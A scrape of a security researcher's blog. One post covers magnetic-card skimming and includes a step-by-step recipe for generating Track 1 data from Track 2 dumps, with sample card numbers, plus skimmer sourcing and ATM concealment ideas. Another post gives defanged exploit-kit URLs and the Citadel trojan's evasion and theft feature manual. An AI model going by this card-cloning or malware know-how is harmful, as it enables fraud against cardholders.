Quantcast
Channel: XyliBox
Viewing all 128 articles
Browse latest View live

News !

October 12, 2012, 3:51 am
$
0
0
I will start to do a series of post about real life 'hacking' and subculture.
to make you wait until next post here is some photos of 3d skimmer:
I will also do a huge post about skimming soon.
Search

How i carded myself

October 14, 2012, 3:46 am
$
0
0
After talking to some carders, one told me directly to try carding.
Not a bad idea the magnetic strip always intrigued me, so i've started to think like a carder obviously without the goal to harm people..
Here are some research made by others i've found/learn from:
 La face cachée des tickets RATP (French article)
Explication de la sécurité des bandes magnétiques (French article)
RATP Hacking (French also)
22C3: Magnetic Stripe Technology
Lecture de bandes magnétiques DIY (French)

I've also buy two French ebooks:


A good French television report about skimming "Encore + d'action Arnaques aux faux papiers : révélations sur un scandale"

So... let's start.
Firstly to be familiar with the magnetic strip, i've buy a MSR605:

20 blank cards was with my MSR:

A card to clean the MSR (i don't know what that look like)


Writing a card:

Carder asking question about the MSR605:

The Msr206 is mainly used/recommended by carders because of it popularity and due to encoding softwares.
My Msr605 is compatibleMsr206, so i profit of it for do a 'fast' review of "The Jerm" a software coded by carder, for carders:

Settings:

Tracks generator:

Bank Card:

Reconstruct:

There is even a help file:


I was hmm "wow cool he made this because orginal software sucks" so i've do the same for fun.
First time i use the MSComm control of Visual Basic :)
Source code here: http://planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=74498&lngWId=1

I've also view this software on a carding forum and still made in Visual Basic:
How tracks work ?
I've searched a bit and found a clear explanation here is a copy/past:
There are actually up to three tracks on a card.
Track 1 was designed for airline use. It contains your name and usually your account number. This is the track that is used when the ATM greets you by name. There are some glitches in how things are ordered so occasionally you do get "Greetings Bill Smith Dr." but such is life. This track is also used with the new airline auto check in (PSA, American, etc)
Track 3 is the "OFF-LINE" ATM track. It contains security information as your daily limit, limit left, last access, account number, and expiration date. (And usually anything I describe in track 2). The ATM itself could have the ability to rewrite this track to update information.
Track 2 is the main operational track for online use. The first thing on track to is the PRIMARY ACCOUNT NUMBER (PAN). This is pretty standard for all cards, though no guarantee.
Example of Track1: B4888603170607238^Head/Potato^050510100000000001203191805191000000
Example of Track2: 4888603170607238=05051011203191805191

Usually only track1 and track2 are needed to exploit the ATM card.
Let us examine track1.
Take the Credit Card account number from Track 2 in this example it
is:4888603170607238 and add the letter "B" in the front of the number like
this B4888603170607238 then add the cardholder name YOU want to show on the
card B4888603170607238^Head/Potato^(Last name first/First Name)next add the
expiry date and service code (expiry date is YYMM in this case 0505,and in
this case the 3 digit service code is 101 so add 0505101 ,
B4888603170607238^Head/Potato^0505101
No add 10 zero's after service code:
B4888603170607238^Head/Potato^05051010000000000
Next add the remaining numbers from Track2 (after the service code)
B4888603170607238^Head/Potato^050510100000000001203191805191
and then add six zero's (6) zero's
B4888603170607238^Head/Potato^050510100000000001203191805191000000 this is
your Track 1
Track 1:B4888603170607238^Head/Potato^050510100000000001203191805191000000

REMEMEBER THIS IS ONLY FOR VISA AND MASTER CARD(16digits) , AMEX HAS 14
DIGITS, this doesn't work for Amex

FORMAT FOR TRACK2
CC NUMBER: YYMM (SERVICE CODE)(PVV)/(CVV)
Here is the Fleet's credit track2 dump:
4305500092327108=040110110000426
we see card number, an expiration date, 1011 - service code, 0000 is the place for pvn (but it is absent!), and at least 426 is the cvv (do not mix with cvv2)
Now let's take a look on MBNA's track2 dump:
4264294318344118=04021010000044500000
here we see the same - no pvn's and other verification information -just a cvv.

As clearly shown above it is possible to generate track1 from track2 using the method shown above. However track2 gen software automates the process.

So i't's simple i've already do a better app than DarkAngel in just 11 lines by just using String Functions of VB:

 If you wonder what 'disco' do on my MSR 605 Utils:

Well that cool, i've read my train tickets, bus, played with leds and shit's...
I've also buy an UV LED flashlight, to view holograms and stuff (i don't really need that but my friend got owned last time):

Security guilloche visible by UV:

After this i've started a more serious project: build a skimmer.
I've do some search on how these device work, what's i need, where, etc...
And figured that making a skimmer was really simple, afterall it's just a simple magnetic swipe reader.
So i've searched on Google a website to buy electronics and found a Chinese company.
For 450$ i've buy the battery, and everything i need to read correctly  and save datas of any magnetic cards. (and the company have pay DHL)

 450$ USD for just 0.200 kg of electronic is a bit expensive, but MSR material have a high cost.
 And yeah, it's very small:



Also fun fact: when i received the package, they don't talk about MSR stuff but about USB cables:


These USB cables:

Although these cables looks like a standard mobile phone cable, it is not.
It contains a USB to Serial Port convertor and a custom pin layout, therefore it cannot be replaced by any other cable made by other manufacturers.
Using other cables can dammage the electronic.

USB Charger Cable charging the battery:

There’s a red LED flickering when the battry is not found.
Once connected, the red LED will be light, when the LED will turn off, it means the battery is full.

Now, the main problem was to get ATM plastic.
Firstly i've thought to build a RepRap and then build my plastic with (a RepRap is a free desktop 3D printer)
Some carders also wanted me to buy their plastics, the prices of one guys:
100$ NCR over anti MCIR
80$ Wincor nano2
100$ Diebold
150$ NCR round
+ DHL 80$, and minimum order: 5 pieces.

For me, that was clearly not possible, to cooperate with a criminal so i've searched another option.
And finally i've found a guys (Once again from China) who can sell me heatpressed Wincor plastic for the cheap price of 66.11$ (DHL included)





It's the original ATM anti-skimming part, not the skimmer version.
but carders have already adapted the work to skim anti-skimmer:
I've asked the guys who sell this for picture he sent me this:

MSR stuff:

 Let's have a look on the electronic CD, a software is provided.
For the first use they ask us a password who can be changed later:

Card dump saved on the electronic:

A video is probably better so...

The price of a complet skimmer are really high on carders forums, when carders on underground forum sell skimmers for ~2000$ i've made myself one (sure it can't be used) for just 516.11$ price is divided by 3.
I can also buy a camera and shit's but i've stopped here (what's i will do with all this material after?)


For the video i thinked to a key chain spy camera:
Take the circuit board and hide it behind a fake visa sticker on the ATM ?
There is another solution if the guys try to cover the pin: fake atm keyboard.
Yeah... it's hard to stay safe these days..

Interview with a guys who work for the French governement (thanks again!):
Quel est le chiffre en France sur la fraude a la carte bancaire s’il y en a ?
A: Selon le rapport annuel d'activité de l'Observatoire de la sécurité des cartes de paiement, le montant total de la fraude à la carte bancaire s’est élevé à 413,2 millions d’euros en 2011.
La fraude par internet connaît le plus fort taux d’augmentation (une étude de l’UFC que Choisir de février 2012 a révélé que, chaque minute, un paiement frauduleux serait réalisé sur Internet en France).

Combien de carders on été arrêté en France en 2011 ou depuis le début de l’année ?
A: Depuis 2012, trois grandes affaires ont été recensées en France concernant l’arrestation de carders :

Avril 2012 : Un groupe de cybercriminel originaire d’Europe de l’Est (des Estoniens, des Lituaniens, des Lettons, des Géorgiens et un Tchétchène) est arrêté sur la Côte d’Azur. Ces derniers achetaient sur des forums underground les données contenues dans les pistes magnétiques des cartes bancaires. Ces données piratées étaient ensuite encodées dans des cartes bancaires vierges.
Grâce à ces cartes bancaires contrefaites, le groupe criminel réalisait des achats de grandes valeurs dans l’industrie du luxe (notamment à Cannes). Près de 900 transactions, correspondant à un montant d'environ 200 000 euros ont pu être comptabilisées par l’OCLCTIC.

Juin 2012 : L'OCLCTIC arrête une quinzaine de ressortissants du Nigéria, accusés d'avoir causé d'importantes pertes financières à la SNCF.
Le mode opératoire du groupe était simple : acheter en ligne des billets SNCF avec des numéros de cartes bancaires piratés puis les revendre directement sur des sites spécialisés dans l'offre de voyages discount.
Des investigations sur ce groupe criminel ont permis de découvrir que ces derniers commandaient également de nombreux produits de luxe en ligne, dont la revente leur procurait de confortables revenus.

Juillet 2012 : Le serveur d'un restaurant, doté d’une excellente mémoire visuelle, mémorisait les détails des numéros des cartes bancaires de ses clients puis les revendait à des complices dans la région parisienne.
Des achats frauduleux étaient alors réalisés sur Internet, le préjudice total étant estimé à près de 500 000 euros.
Néanmoins, les 300 utilisations frauduleuses recensées pourraient être beaucoup plus nombreuses, car de nombreux clients étrangers n'ont pas porté plainte.
De telles escroqueries se multiplient en France, mais la réponse pénale reste encore insuffisante.

En France ce type de criminalité est-elle en expansion ?
A: La cybercriminalité étant en constante évolution au niveau mondial, ce type de criminalité ne fait, par expansion, que progresser en France.

En général est-ce que les carders sont faciles à attraper ?
A: Plusieurs facteurs empêchent d’identifier et d’arrêter les carders :
- Manque de coopération internationale (certains cybercriminels sont réfugiés dans de véritables « paradis numériques »)
- Difficulté d’identification (les carders bénéficient de multiples outils leur permettant de s’anonymiser totalement = proxy, VPN, serveur offshore)
- Difficulté d’accéder ou de récupérer un nombre de preuves suffisantes à l’encontre du carder.

La plupart des carders opérant en France sont-ils d’origine française ?
A: Oui et non : des carders d’Europe de l’Est ou de certains pays d’Afrique (Nigéria, Cameroun, Côte d’Ivoire) opèrent directement en France, car cela leur permet de mener leurs méfaits beaucoup plus facilement.
Cependant, tous les carders ne sont pas étrangers, une fréquentation de forums cybercriminels ayant permis de relever une présence française non négligeable. De plus, un important revendeur de numéros de cartes bancaires se faisait passer pour un citoyen russe a pu être identifié comme de nationalité française.
Exemple ci-dessous d’une copie d’écran issue de certains de ces forums :

Avec le dédouanement de colis en France et ce que beaucoup de fausse carte/skimmer sont stoppés avant utilisation ?
A: De nombreuses annonces proposent l’achat de skimmer ou fausse carte bancaire, livrables partout dans le monde. Il est très probable que la plupart de ces colis ne soient pas interceptés par les douanes, ces dernières ne vérifiant d’un infime pourcentage du nombre de colis arrivant de l’étranger sur le territoire français (seul 2 à 3% des colis sont contrôlés).

Certains vendent des faux papiers (en général fausse CNI/Permis de conduire) risque-t-il plus qu’un carder ?
A: La fabrication et l’usage de faux documents administratifs (carte d'identité, certificat de nationalité, passeport,...) est punis d’une peine de 5 ans de prison et/ou de 80.000 euros d’amende.

Le fait d'accéder ou de se maintenir, frauduleusement, dans tout ou partie d'un système de traitement automatisé de données est puni de deux ans d'emprisonnement et de 30000 euros d'amende.

Lorsqu'il en est résulté soit la suppression ou la modification de données contenues dans le système, soit une altération du fonctionnement de ce système, la peine est de trois ans d'emprisonnement et de 45000 euros d'amende. (Article 323-1 du Code Pénal)

Est puni des mêmes peines le fait, commis de mauvaise foi, d'intercepter, de détourner, d'utiliser ou de divulguer des correspondances émises, transmises ou reçues par la voie des télécommunications ou de procéder à l'installation d'appareils conçus pour réaliser de telles interceptions. (Article 226-15 paragraphe 2 du Code Pénal)

Concernant la bande démantelée surprise en train de braquer un distributeur de la caisse d’épargne avec une ‘fourchette’, maintenant que la faille sur les distributeurs NCR a été dévoilée, le pire est  à venir ?
A: Pour le moment, aucune solution ne semble avoir été trouvée afin de mettre fin à ce stratagème.

Les banques n’ont pas communiqué sur le montant réel de leurs pertes, certains articles de presse ayant avancé le chiffre de un million d’euros (invérifiable).

Est-il légal de cloner sa carte bancaire pour avoir un double ?
A: Certainement pas = cloner sa carte bancaire pourrait être assimilé à un délit de contrefaçon.

La technologie RFID a tel de l’avenir dans le carding ?
A:Énormément = cf cet article de presse

http://www.01net.com/editorial/571737/le-scandale-des-nouvelles-cartes-bancaires/

Un français a pu faire la démonstration de cette impressionnante faille de sécurité (Renaud Lifchitz)

Après les distributeurs automatiques est-ce que les pompes à essence sont les plus visées  par les skimmers ?
A: Les pompes à essence sont en effet une cible de choix, car elles échappent à toute surveillance (il est aisé d’y déposer un skimmer et de venir le récupérer en toute discrétion).

Les cameras dôme anti-vandale placé à côté des distributeurs sont-elles réellement dissuasives ?
A: Dissuasive dans une certaines mesure car le cybercriminel risque d’être identifié par la caméra. Cependant, ces derniers envoient généralement un tiers récupérer l’argent à leur place dans les distributeurs automatiques, échappant ainsi à tout risque d’identification.

Les « volontaires » acceptant de prendre le risque peuvent garder un pourcentage significatif de la somme retirée.

Est-ce que les bandes magnétiques ne sont pas un peu dépassées comme technologie depuis le temps ?
A: Elles sont dépassées dans la mesure beaucoup d’informations sensibles y sont stockées (nom du titulaire de la carte/PAN/date d’expiration). Cependant, pour des soucis de retro compatibilité les bandes magnétiques sont pour le moment conservées.

Cf document = http://rafale.org/~mattoufoutu/ebooks/Rafale-Mag/Rafale03/Rafale3.01.HTML

Est-ce que j’ai plus de chance de me faire piéger par un terminal de point de vente compromis ou par un distributeur automatique qui possède une fausse façade ? ?
A: Par un terminal de point de vente compromis. La majeure partie des numéros de cartes bancaires vendus sur Internet provient de terminaux piratés.

Si on se fait agresser en retirant de l'argent, tapé sont code PIN à l’envers permettrait de le signalé a la police, info/intox ?
A: Grosse intox :)

Le phishing rapport -il plus que le cardage réel ?
A: Il est difficile de répondre à cette question, car certains carders ne gagnent que quelques centaines d’euros par mois alors que d’autres des millions. La problématique est le même pour le phishing, tout dépend de l’importance avec laquelle une campagne de phishing sera propagée (combien de boîtes mails par exemple).

Un site qui possède une connexion SSL n’est pas plus sécurisé qu’un site qui n’en possède pas ?
A: La connexion SSL permet de communiquer de manière confidentielle entre l'utilisateur et le serveur Web. Elle empêche l'écoute passive ou active d'un attaquant localisé sur le même réseau local que sa victime.

Quel et le nom de la cellule de veille qui s’occupe de la fraude en France ?
A: L’Office Central de Lutte contre la Criminalité liée aux Technologies de l'Information et de la Communication

Un conseil quand on et face a un distributeur pour détecter si celui-ci n’est pas compromis ?
A: De plus en plus de mesure de sécurité permettent de détecter automatiquement lorsqu’un matériel inconnu est intégré à un distributeur de billets. Néanmoins, les précautions d’usages doivent toujours être respectées : taper son code PIN en cachant le clavier et vérifier qu’aucun matériel suspect ne soit intégré dans la partie permettant d’insérer sa carte bancaire.

English version:
What are the statistics on bank card fraud in France, if there are any?
A: According to the annual activity report of the French Observatory for Payment Cards Security, bank card fraud losses totalled €413.2 million in 2011.

Internet fraud has seen the biggest increase (a study by the French consumer group UFC Que Choisir in February 2012 revealed that a fraudulent payment is made online every minute in France).

How many card fraudsters were arrested in France in 2011, or have been arrested since the start of the year?
A: So far in 2012, there have been three major arrests of card fraudsters in France:

April 2012: A group of cybercriminals from Eastern Europe (Estonians, Lithuanians, Latvians, Georgians and a Chechen) were arrested on the French Riviera. They were buying the data stored on the magnetic strips of bank cards on underground forums. The stolen data was then transferred to blank bank cards.
The criminal gang used the counterfeit bank cards to buy expensive luxury goods, primarily in Cannes. Nearly 900 transactions, with a total value of around €200,000, have been identified by the OCLCTIC [French Central Office for the Fight against Crime Related to Information Technology and Communication].

June 2012: The OCLCTIC arrested fifteen or so Nigerian nationals, who are accused of causing the SNCF [France’s national state-owned railway company] significant financial losses.
The gang’s modus operandi was simple: buy SNCF tickets online using stolen card details and then sell them on websites specializing in low-cost travel.
Investigations into the criminal gang have revealed that they also ordered large numbers of luxury goods online and earned a comfortable living from selling them on.

July 2012: A restaurant waiter who has an excellent visual memory memorized his customers’ card details and then sold them on to accomplices in and around Paris.
Fraudulent purchases were then made online, causing losses estimated at nearly €500,000.
However, there could be many more than the 300 fraudulent uses identified because many foreign customers haven’t filed a complaint.
This kind of fraud is rising in France, but the criminal justice system is still slow to respond.

Is this type of crime on the increase in France?
A: As cybercrime is constantly increasing around the world, this type of crime is, by extension, increasing in France.

Are card fraudsters easy to catch generally?
A: There are several obstacles to identifying and arresting card fraudsters:
– Lack of international cooperation (some cybercriminals have fled to "digital havens")
– Difficulty in identifying card fraudsters (they have access to several tools that make them totally anonymous = proxy, VPN, offshore server, etc.)
– Difficulty in accessing or gathering enough evidence against card fraudsters.

Are most of the card fraudsters operating in France French?
A: Yes and no: card fraudsters from Eastern Europe or some African countries (Nigeria, Cameroon and the Ivory Coast) operate in France because it’s much easier for them to do their deals here.
However, not all card fraudsters are foreigners and visiting cybercriminal forums reveals a French presence that’s not insignificant. What’s more, a major seller of bank card details who claimed he was Russian was, in fact, a French national.
Example below of a screenshot from one of these forums:

With the customs clearance of packages in France, are many fake card/skimmers stopped before being used?
A: There are lots of adverts selling fake cards or skimmers, which can be delivered to anywhere in the world. In all likelihood, most of these packages aren’t intercepted by customs as they only check a tiny proportion of the packages coming into France from abroad (only 2 to 3% of packages are checked).

Do sellers of fake documents (generally identity cards/driving licences) have more to lose than a card fraudster?
A: Making and using fake administrative documents (identity cards, certificates of nationality, passports, etc.) is punishable by five years in prison and/or a €80,000 fine.
Fraudulently accessing or using all or part of an automated data processing system is punishable by two years in prison and a €30,000 fine.
If the data stored by the system is deleted or changed, or how the system works is altered, the punishment is three years in prison and a €45,000 fine (Article 323-1 of the French Penal Code).
The same punishment applies to intercepting, hijacking, using or disclosing information that is generated, transmitted or received by telecommunications carriers or installing devices designed for that purpose (Article 226-15 Paragraph 2 of the French Penal Code).

About the gang caught robbing a Caisse d’Épargne cash machine with a fork, now that the flaw in NCR cash machines has been made public, is the worst yet to come?
A: At the present time, there doesn’t appear to be any way of stopping it.
Banks haven’t published their actual losses although some press articles have put forward the figure of €1 million (impossible to verify).

Is it legal to clone a bank card to have two copies?
A: Absolutely not = cloning a bank card could be considered counterfeiting.

Will we see RFID technology in bank card fraud in the future?
A: Very much so = see this press article:
http://www.01net.com/editorial/571737/le-scandale-des-nouvelles-cartes-bancaires/
A Frenchman has demonstrated this blatant security flaw (Renaud Lifchitz)

After cash machines, are fuel pumps the biggest target for skimmers?
A: Fuel pumps are a popular target because they’re not watched (it’s easy to install a card skimmer and then come back and collect it without being seen).

Are the anti-vandal dome cameras placed alongside cash machines a real deterrent?
A: Yes up to an extent, because there’s a danger that the cybercriminal will be identified by the camera. However, they tend to send someone else to collect the money from the cash machines for them, ruling out the risk of being identified.
The "volunteers" agree to take the risk for a significant percentage of the amount being drawn out.

Aren’t magnetic strips a bit outdated as technology has improved?
A: They’re outdated insofar as lots of sensitive information is stored on them (name of the cardholder/PIN number/expiry date). However, for compatibility reasons magnetic strips are being kept on for the time being.
See the document = http://rafale.org/~mattoufoutu/ebooks/Rafale-Mag/Rafale03/Rafale3.01.HTML

Do I have more chance of being caught out by a compromised payment terminal in a shop or a cash machine with a false front panel?
A: By a compromised payment terminal in a shop. Most of the bank card details sold online come from pirated payment terminals.

Fact or fiction: if you’re threatened whilst drawing out money, putting in your PIN code backwards will alert the police?
A: Big fat fiction :)

Does phishing bring in more money than actual bank card fraud?
A: It’s difficult to answer that question because some card fraudsters only earn a few hundred euros a month whilst others get millions. It’s the same problem for phishing because everything depends on the scale of the phishing (how many inboxes, for example).

Is a website with an SSL connection more secure than a website without one?
A: An SSL connection provides secure communications between the user and server. It prevents a hijacker on the same local network as the victim from gaining access or taking over.

What’s the name of the authority monitoring fraud in France?
A: The OCLCTIC [French Central Office for the Fight against Crime Related to Information Technology and Communication]

How can we tell if a cash machine has been compromised?
A: More and more security measures automatically detect when unusual devices are attached to a cash machine. Nevertheless, we should still take the same precautions when using one: shield the keypad when you enter your PIN number and check that nothing suspicious looking has been stuck onto the card slot.
I've also asked my bank advisor if i can interview her about credit card/skimming general but she was embarrassed, so i've leave.

A surprise when i've go to my bank:

I think it's more a dysfonctionnement than a skimming failure, the bank was closed so i got no answer.

For information, when a carder want to use French hacked cards, they don't do it in France.
They go to Italia because French atm require a chip (http://en.wikipedia.org/wiki/Smart_card).
See 'Interview with a carder' for more infs (http://www.xylibox.com/2012/01/interview-with-carder.html)
After there is something called Basic Card® but i've not looked how i can copy the chip for the moment, i've just read some docs on Multi-System & Internet Security Cookbook and that all.
For my 'skimmer' i will just keep it on my cybercrime object collections.
And i will probably have a look on RFID technology if my contract of employment will be renewed...





Sorry for my lame English if there is mistakes, take me long to write this and especially to translate the interview i've did.
Broken ATM photo by Mike Hillman.

Citadel 1.3.5.1 Rain Edition

October 17, 2012, 10:52 am
$
0
0
I know i've says i will do some articles about real life 'underground' before starting again on malwares but i've received  (like many) a fake LinkedIn Spam who send you on Blackhole Exploit Kit and who deliver Citadel payload, with some guys in twitter, we investigated the case.

Fake mail from LinkedIn:

Report done by @MalwareMustDie: http://pastebin.com/raw.php?i=z7n6SVxf
By Kim: http://stopmalvertising.com/spam-scams/unsolicited-email-from-linkedin-invites-zeus-bot.html

hxxp://www.nikecup.net/MSmxYk/index.html -> http://jsunpack.jeek.org/dec/go?report=eb44a315b959acb4f6d2aa6930fb3b1a8aaf7f0d
hxxp://www.conquestidiomas.com.br/E6yNoKqE/index.html -> http://jsunpack.jeek.org/?report=817f275a5ecac6a62371be80e0f3fa036105ac19
--
hxxp://dualab.com/v3FXJcVQ/js.js - 217.76.132.170
hxxp://jbrnh.com/3ZKtSw8d/js.js - 184.168.101.248
hxxp://scarom.de/x3xi02wu/js.js - 176.223.123.143
--
hxxp://108.178.59.16/links/assure_numb_engineers.php - http://urlquery.net/report.php?id=234576
hxxp://11.blogbestsites.com/links/assure_numb_engineers.php (108.178.59.16)

Following a Kafeine post about the latest update of Citadel, i've gived a f*ck, trying to get the latest version.
Finally that will be done by hack with (too) many attempts on different servers and with lulz on some:


Want more malware fail ?
With leet stuff like 'KisS OF dEAth', 'htmlvirus' and Stuxnet, ph34r.

Well, let's see the latest advert:

Still with lame joke:

Overview of C&C package:

Some files

 Installation

Personal Manual (for translation, http://translate.google.com/?hl=en&sl=ru&tl=en):
Version 1.3.5.1 Rain Edition
Manual Version: 3.0 (Последнее обновление 03.10.2012)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Cодержание:
1. Нововедения
2. Доступ в CRM и ее описание
3. Step-By-Step установка Citadel
а) Требования к серверу.
б) Шаг 1 [Билдер, права, скрипты]
в) Шаг 2 [Дополнительная защита админки]
г) Шаг 3 [Разбор конфига]
4. Установка BackConnect Windows сервера (VNC модуль)
5. Установка Citadel VNC Admin Interface
6. Установка модуля чекинга веб-соксов (WebSocks)
7. Установка модуля парсера логов (WebParser)
8. Установка модуля CardSwipe
9. Работа с крипт-панелью (Crypt Exe)
10. Установка системы проксирования (прокладка)
11. Краткий мануал по новым фичам админки
12. Работа с API (api.php)
13. Как обновлять админку и бота на следущие версии Citadel
14. Описание опций в конфиге билдера
15. FTP-ифреймер. Характеристика и настройка
16. Описания модуля "Кейлоггер процессов"
17. Модульная GeoIP защита ботнета
18. Модуль "Дубль-клинер логов"
19. Модуль веб-инжектов (WebInjects)
20. Общая рекомендация и частые вопросы
21. Как правильно задавать вопросы в Jabber
22. Лицензионное соглашение и правила использования
23. Список команд для бота
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

********************************************************************************
==========================>>>>> 1. Список возможностей и нововведений Citadel:
********************************************************************************
[+] Фикс VNC бага на Vista/Windows 7. Теперь можно полноценно работать с Internet Explorer 8 (напомню, была проблема с рендерингом IE)
[+] Поддержка Mozilla Firefox 7.0 (решена проблема, при которой не слались отчеты в последних версиях браузера)
[+] Крипто-защита (расшифровывающая тело в памяти).
[+] Редиректы DNS (не через hosts). Можно блокировать/редиректить любые URL'ы, не опасаясь, что их заметит эвристика. Например заблокировать AV-cервера или редиректить банк-пагу на другой хост.
!BONUS! Список URL'ов популярных антивирусных программ для блокирования идет в комплекте.
[+] Информация о версии сотфа в репорте. Высылает вам подробную версию браузера холдера вместе с отчетом. Помогает, при имитации настроек холдера.
[+] Дополнительный уровень защиты сервера от трекеров - Login Key.
[+] Механизм аутинтефикации при загрузке конфигов (нет прямых урлов). Дает полноценную защиту от устоявшихся трекеров.
[+] Поддержка граббера Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+] Поддержка инжектов Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+} Добавлено кеширование поиска функций, что ускоряет установку хуков Chrome.
[+] Добавлена возможность выполнения системных CMD команд при старте бота (секция CMDList) с отправкой репорта на сервер. К примеру, нужно вам чтобы при инсталле, отправлялся результат команды "ipconfig /all", или список всех доступных шар. Полезно, при анализе внутренней структуры компаний. (например, часто попадаются боты в локалке с именами ACCOUNTANT_PC, POS_SERV, DATABASE...)
[+] Добавлен механизм проверки сохранности хуков на некоторых Windows.
[+] Эвристический анализатор окружения со стоп листом для нежелательного ПО (значительно повышает скрытность),включены все популярные антивирусы.
[+] Исправлены мелкие баги.
[+] Видео граббер. Уникальная возможность следить за работой ваших инжектов "глазами холдерами", в конфиге указываются список сайтов и длина записи видео в секундах, при заходе на заданный линк, активируется видео-запись в формате .mkv. Рекомендуется настроить свой сервер для приема файлов 10-60МБ.
[+] Убрано удаление кукисов при инсталле, т.к это сбивает "fingerprint" холдера при работе с заливами.
[+] добавлена поддержка HTTP 1.0 и расширенных хидеров (например респонз не всегда выглядит как "HTTP/1.1 200 OK", бывает "HTTP/1.1 200 follow document", в данном случае после кода 200 идет несколько слов) применимо к браузерам Firexfox & Chrome
[+] Добавлен гейт генератор (на случай, если вы хотите разместить файлы на промежуточном хосте для редиректа).
[+] Полностью переделано шифрование (передача данных, запись логов/видео, загрузка конфигов и т.д) у Citadel, на смену устаревшему RC4 используемому в Zeus, пришел AES 128. Напомню, что RC4 дал асечку, когда массово начали выпускаться различные декрипторы конфигов/инжектов для Zeus, а хосты начали палиться в abuse.ch.
Теперь помимо встроенного RC4, который шифруется с вашей персональной сигнатурой, в софт также встроено AES шифрование, на выходе мы получаем защищеное AES128 обращение бот<->гейт. Никакие ZeusDecryptor'ы(ThreatExpert) и автоматизированый реверсинг не будут помехой для вашей комфортной работы на текущий момент (Jan 2012).
[+] Весь базовый функционал, оставшийся от зевса присутствует. Думаю, не стоит его писать здесь снова.
[+] Исправлена ошибка записи репортов у веб-фильтров в конфиге с параметром "!" (игнорирование), который должен был исключать все заданные ссылки, а вместо этого делал обратное и писал их в лог.
[+] Добавлен новый параметр-фильтр в config-файл, а именно функция отсылать или не отсылать cookies на сервер.
Параметр статичного конфига disable_cookies 0/1 указывает отключить ли граббинг куков (1 - отключить, 0 - включить).
Вручную, также, кукисы можно получить командой user_cookies_get из админки, если очень нужны.
[+] Добавлена функция произвольного открытия страницы дефлотовым браузером пользователя на боте.
К примеру, если вам нужно накрутить какой-нибудь счетчик или статистику голосования или вы хотите получать доп.доход с вашего ботнета открывая страницы с шопами (а также: фарма, гемблинг, дроп-проекты и т.д..) отличный способ разрекламировать нужную страницу!
Новый параметр url_open <url>
[+] Новый вид фильтрации WebFilters в конфиг-файле при сборке.
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметры не комбинируются, т.е. следует указывать какой-то один из них.
[+] Добавлена модульная система в софт, что дает нам:
* Расширяемость и загрузку любого операционного функционала ботам, ориентированного для Citadel.
Все модули загружаются с сервера и распаковываются динамически в памяти, что исключает их детектирование.
Хранение и передача во внешнем мире исключительно в шифрованном виде.
Модули грузятся в целевые процесссы, поэтому весомо экономят память.
Большая управляемость - модули можно отключать через конфиг.
[+] Видео-граббер переделан на модульную основу. Теперь вес некриптованного билда <190 кб. Всегда.
[+] Добавлен новый параметр timer_modules (тайминги для загрузки модулей).
[+] Добавлена поддержка нового браузера Google Chrome 17, а также исправлен баг с обработкой Flash'a в нем.
[+] Добавлена поддержка макросов. Введены макросы: %BOTID%, %BOTNET%
* Можете вставлять в любой участок инжектов данные макросы и передавать данные на ваш сервер (АЗ/инжекты), передается имя бота и имя ботнета.
[+] Добавлены 4 команды управления модулями (включение/выключение, запрет/разрешение на скачивание).
[+] Добавлен новый параметр disable_httpgrabber 1/0 для Chrome: исключает обработку обычных HTTP (не HTTPS) запросов.
[+] Добавлена запись полного User-Agent в отчеты HTTP(S) граббера, позволяет клонировать холдерский UserAgent через любые утилиты типа CCTools.
[+] Добавлена запись разрешения экрана в отчеты HTTP(S) граббера, пример "Screen(w:h): 1600:900" - полезно при клонировании параметров холдера, многие банки на это обращают внимание.
[+] Изменен протокол отправки видео-файлов для снижения нагрузки на сервер (у некоторых были проблемы с нагрузкой на сервер и он сильно тормозил)
[+] Добавлена возможность отсылки jabber-уведомлений нескольким получателям в админке Citadel.
[+] Добавлена возможность указания нескольких url_config'ов (пути до основного конфига), раньше было так: если у вас недоступен основной конфиг в момент инсталла бота, то резервный никак не скачивался, теперь этой проблемы не будет и бот пытается стянуть конфиг с другого URL'a(можно вписать до 3 резервных).
[+] Исправлена ошибка в Google Chrome (17x) приводящая к зависанию подпроцесса, при открытии нескольких вкладок с инжектами.
[+] Добавлены новые команды:
- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_firewall
- Получение информации об установленном антивирусе на компьютере: info_get_antivirus
- Получение информации об установленном фаерволе на компьютере: info_get_firewall
Информация идет в виде отдельного репорта для каждого бота. Скоро встроим массовую статистику по установленному софту в админку Citadel.
[+] Изменен алгоритм антиэмуляции для ряда АВ (не считается криптором, софт стал невидимым для нескольких проактивок).
[+] Исправлена проблема запуска под пользователем SYSTEM.
[+] Добавлена возможность особых Jabber-уведомлений, при обнаружении заданных ботов по маске (к примеру маска *corporate*, будет искать botid с таким совпадением), даже если они не прислали никаких логов, скрипт уведомит вас в Jabber-сообщении о появлении бота. Теперь вы не пропустите мимо глаз ценных ботов.
[+] В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!
[+] Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 37.1%, ваши боты будут иметь самый свежий и чистый билд.
[+] Переработана система отправки отчетов на сервер, в предыдущих версиях для каждого отчета происходила единичная отправка POST запроса на гейт, в новой схеме отчеты отправляются пачкой по несколько штук, это позволяет свести до минимума количество сессий на сервере и нагрузка на сервере становится минимальной, что позволяет выдерживать большое количество ботов онлайн.
